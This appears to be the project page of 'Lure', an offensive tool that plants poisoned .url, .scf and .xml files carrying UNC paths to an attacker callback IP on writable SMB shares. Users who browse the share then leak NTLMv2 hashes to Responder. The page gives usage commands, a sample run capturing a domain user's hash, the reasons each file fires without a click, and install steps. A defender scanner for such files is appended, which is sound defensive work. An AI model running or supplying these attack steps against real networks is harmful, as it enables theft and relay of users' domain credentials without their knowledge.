Drops poisoned .url, .scf, and .xml payloads onto writable SMB shares. The first user to browse the share triggers NTLM authentication back to your Responder listener.
$ sudo lure drop -t 10.10.10.5 -c 10.10.14.3 -i tun0 -s public
[+] Wrote @lure.url
[+] Wrote @lure.scf
[+] Wrote @lure.xml
[*] Uploading 3 payload(s) at //10.10.10.5/public
[*] Starting Responder on tun0
[SMB] NTLMv2-SSP Hash : CORP\jdoe::CORP:…
Each payload abuses a different Windows auto-resolve behavior. The @ prefix sorts files to the top of the directory listing, maximizing the chance a curious user browses them first.
lure drop generates the payloads, uses smbclient to upload them (anonymous, authenticated, or into a nested subdirectory), then hands off to Responder on your chosen interface. Add --no-listen to drop only, or use lure listen -i IFACE separately.
.url: Internet shortcut with an IconFile UNC path. Windows Explorer resolves the icon the moment the share is browsed, with no click required.
.scf: Shell command link that also forces icon resolution via UNC. Old-school trick that still fires on modern Windows when Explorer previews the directory.
.xml: Word document with an xml-stylesheet processing instruction pointing at a remote XSL over UNC. Fires when a user opens the doc.
When the share root is read-only but a subdirectory is writable, -d <path> uploads the payload directly into the nested location without requiring a separate mount or CWD change.
-u accepts user, DOMAIN/user, DOMAIN\user, or user@DOMAIN.LOCAL. Passwords resolve from --pass, $LURE_PASSWORD, or --ask-pass.
Single-file Python tool. Wraps smbclient for upload and responder for capture. Runs on any Kali-style attacker workstation.
Lure chains four stages behind a single command. Every stage is a thin wrapper around tools already on your Kali box.
Writes a .url, .scf, or .xml template with your callback IP embedded in the UNC path. The @ filename prefix sorts the file to the top of directory listings; --name overrides for telemetry-aware engagements.
Wraps smbclient with anonymous, authenticated, and nested upload modes via a single subprocess.run argv list — no shell, no injection surface. Multiple payloads land in one session.
When a user browses the share, Explorer resolves the UNC icon reference or opens the Word document. Windows auto-authenticates to the attacker IP using the user's NTLM credentials.
Lure shells out to sudo responder -I <iface> -wv on the interface you provide. Skip with --no-listen or invoke lure listen -i IFACE separately. Inbound NTLMv2 hashes land in Responder's log for offline cracking or relay.
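A defender-side check for the three payload types described above, as an added example that is not part of Lure or the original page: it walks a mounted share and reports .url, .scf and .xml files whose IconFile or xml-stylesheet reference points at a UNC host outside an allow-list. The function names, the trusted-host list and the sample files (built around the documentation address 192.0.2.10) are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

SUSPECT_EXT = {".url", ".scf", ".xml"}  # payload types named on this page
# IconFile= entry (.url / .scf) whose value is a UNC path
ICON_UNC = re.compile(r"(?im)^\s*IconFile\s*=\s*(\\\\[^\\\s]+\\\S*)")
# xml-stylesheet processing instruction whose href is a UNC path
XSL_UNC = re.compile(r"""(?i)<\?xml-stylesheet\b[^>]*?href\s*=\s*["'](\\\\[^\\"']+\\[^"']*)""")

def decode(raw):
    """Shortcut files may be UTF-16 with a BOM; otherwise treat as UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8", errors="replace")

def scan_share(root, trusted_hosts=()):
    """Return (relative path, marker, host, at_prefixed) for untrusted UNC refs."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_EXT:
            continue
        text = decode(path.read_bytes()[:65536])  # references sit near the top
        for marker, rx in (("IconFile", ICON_UNC), ("xml-stylesheet", XSL_UNC)):
            for m in rx.finditer(text):
                host = m.group(1).lstrip("\\").split("\\", 1)[0].lower()
                if host not in trusted:
                    rel = path.relative_to(root).as_posix()
                    findings.append((rel, marker, host, path.name.startswith("@")))
    return findings

def demo():
    """Scan a constructed share tree; fs01 is a hypothetical trusted file server."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "docs").mkdir()
        (root / "@a.url").write_text("[InternetShortcut]\nURL=https://example.com\nIconFile=\\\\192.0.2.10\\x\\i.ico\n")
        (root / "docs" / "@b.scf").write_bytes("[Shell]\r\nIconFile=\\\\192.0.2.10\\x\\i.ico\r\n".encode("utf-16"))
        (root / "@c.xml").write_text('<?xml version="1.0"?>\n<?xml-stylesheet type="text/xsl" href="\\\\192.0.2.10\\x\\s.xsl"?>\n<doc/>\n')
        (root / "intranet.url").write_text("[InternetShortcut]\nIconFile=\\\\fs01\\icons\\i.ico\n")
        (root / "local.url").write_text("[InternetShortcut]\nIconFile=C:\\Windows\\a.ico\n")
        return scan_share(root, trusted_hosts={"fs01"})

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against a read-only mount of the share; the last tuple field marks the @ filename prefix, which is only a hint because the name can be overridden with --name.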
Python package installable via pipx or pip. Requires smbclient and responder on $PATH — both ship with Kali.
# Install with pipx (recommended)
$ pipx install git+https://github.com/Real-Fruit-Snacks/Lure.git

# Or standard pip
$ pip install git+https://github.com/Real-Fruit-Snacks/Lure.git

# System dependencies (Kali)
$ sudo apt install smbclient responder

# Verify install
$ lure --help
# Drop a .scf on an open share
$ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE -p scf

# Authenticated upload to a domain share
$ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE \
    -u DOMAIN/USER --ask-pass

# Drop all three (default) into a nested subdirectory
$ sudo lure drop -t TARGET -c CALLBACK -i IFACE -s SHARE \
    -d path/to/dir

# Clean up after the engagement
$ sudo lure clean -t TARGET -s SHARE